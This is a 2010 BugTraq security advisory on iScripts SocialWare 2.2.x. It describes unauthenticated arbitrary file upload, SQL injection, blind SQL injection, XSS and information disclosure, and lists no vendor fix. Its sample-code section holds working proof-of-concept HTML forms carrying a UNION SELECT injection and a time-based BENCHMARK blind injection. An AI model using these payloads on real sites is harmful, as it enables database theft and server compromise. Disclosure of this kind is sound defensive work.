BugTraq
iScripts SocialWare 2.2.x Multiple Remote Vulnerability Jul 03 2010 04:12PM
Salvatore Fresta aka Drosophila (drosophilaxxx gmail com)

iScripts SocialWare 2.2.x Multiple Remote Vulnerability

Name iScripts SocialWare
Vendor http://www.iscripts.com
Versions Affected 2.2.x

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-03-07

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX

I. ABOUT THE APPLICATION

iScripts SocialWare is an award-winning, easy to use
social networking software that enables you to create
your own social network like MySpace, Orkut, Friendster,
Linkedin, Facebook, Hi5, etc.

II. DESCRIPTION

This CMS is affected by multiple remote security flaws,
such as SQL Injection, Arbitrary File upload, etc.
These security flaws DO NOT require authentication. Other
files may be vulnerable.

III. ANALYSIS

Summary:

A) Multiple Arbitrary File Upload
B) Multiple SQL Injection
C) Multiple Blind SQL Injection
D) Multiple Reflected and Stored XSS
E) Information Disclosure

A) Multiple Arbitrary File Upload

The file's extension of the file sent to jobs.php?step=4
using the txtResume parameter is not properly sanitised.
The destination folder is jobs/resume, permission 777.
There is no extension restriction.

Another Arbitrary File Upload flaw was reported in a
previous security advisory (2010-07-02):

http://www.salvatorefresta.net/files/adv/iScripts%20SocialWare%202.2.x%2
0Arbitrary%20File%20Upload%20Vulnerability-02072010.txt

event/function.php is affected by the same arbitrary file
upload flaw reported in the previous security flaws. It is
possible to upload a php file if the Content-Type is
image/jpeg or image/gif and the file's extension is php5.
The destination directory is event_category.

manage_music.php is affected by the same flaw reported in
the previous security advisory. It is possible to upload
a php file if the Content-Type is allowed (audio/mpeg
etc.). The destination directory is music/files.

Also manage_videos.php, album.php (function.php),
manage_networks.php use the same vulnerable upload method.

B) Multiple SQL Injection

event_thereactive.php is included by events.php when the
action parameter is set to show. In this script, the id
parameter is not properly sanitised before being used in a
SQL query. To view the information without be redirected
to another page from events.php, the injection must be
sent using the POST method instead of the GET method. This
is possible because in the affected file, the id parameter
is readed using the $_REQUEST array.

event_create2.php is affected by the same bug. To exploit
it, the action parameter must be set to create2.

C) Multiple Blind SQL Injection

The Id parameter in function.php when $_POST['status'] is
set to create2 is not properly sanitised before being
used in a SQL query. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
The affected query types are respectively an UPDATE and a
SELECT.

D) Multiple Reflected and Stored XSS

All forms that allow HTML tags are vulnerable to stored
XSS. The reason is that there are no checks about
javascript tags. Many reflected XSS are allowed but it is
impossible use single/double quotes because of the escape.

E) Information Disclosure

phpinfo.php executes the PHP function's phpinfo() that
prints a lot of information about the server and path
names.

IV. SAMPLE CODE

A) Multiple Arbitrary File Upload

Go to jobs.php?step=4 and try to upload any file.

http://www.salvatorefresta.net/files/poc/PoC-iScriptsSW22.c

B) Multiple SQL Injection

<html>
<head>
<title>PoC - SocialWare 2.2.x SQL Injection</title>
</head>
<body>
<form method="POST" action="http://site/path/events.php?action=show">
<input type="hidden" name="id" value="-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29">
<input type="submit">
</form>
</body>
</html>

C) Multiple Blind SQL Injection

<html>
<head>
<title>PoC - SocialWare 2.2.x Blind SQL Injection</title>
</head>
<body>
<form method="POST" action="http://site/path/event/function.php">
<input type="hidden" name="status" value="create2">
<input type="hidden" name="Id" value="-1 OR (SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)))">
<input type="submit">
</form>
</body>
</html>

E) Information Disclosure

http://site/path/phpinfo.php

V. FIX

No Fix.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus